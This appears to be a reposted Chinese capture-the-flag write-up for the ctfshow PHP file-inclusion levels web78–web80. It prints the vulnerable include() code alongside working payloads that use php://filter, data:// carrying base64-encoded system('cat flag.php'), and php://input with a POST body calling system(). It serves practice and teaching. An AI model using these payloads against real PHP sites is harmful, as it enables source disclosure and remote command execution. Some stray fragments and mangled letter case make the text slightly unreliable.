微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

ctfshow—文件包含

参考

PHP伪协议总结 - SegmentFault 思否

​​​​​​​​​​​​​​WEB78 无防护读取源码

<?PHP
 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

伪协议读取后base64解密

payload:?file=PHP://filter/convert.base64-encode/resource=flag.PHP

web79 data协议

<?PHP
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("PHP", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了PHPPHP到是可以用大写绕过,但是文件名flag.PHP中的PHP不能大小写,所以用cat这一类的函数,也可以直接base64绕过PHP

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?PHP system('cat flag.PHP');
ils/120361970

查看源代码

web80 input协议

 <?PHP
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("PHP", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

PHP data被过滤

用input协议

继续使用PHP大小写绕过

GET:
 ?file=PHP://input
POST:
<?PHP system('tac fl*');?>

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐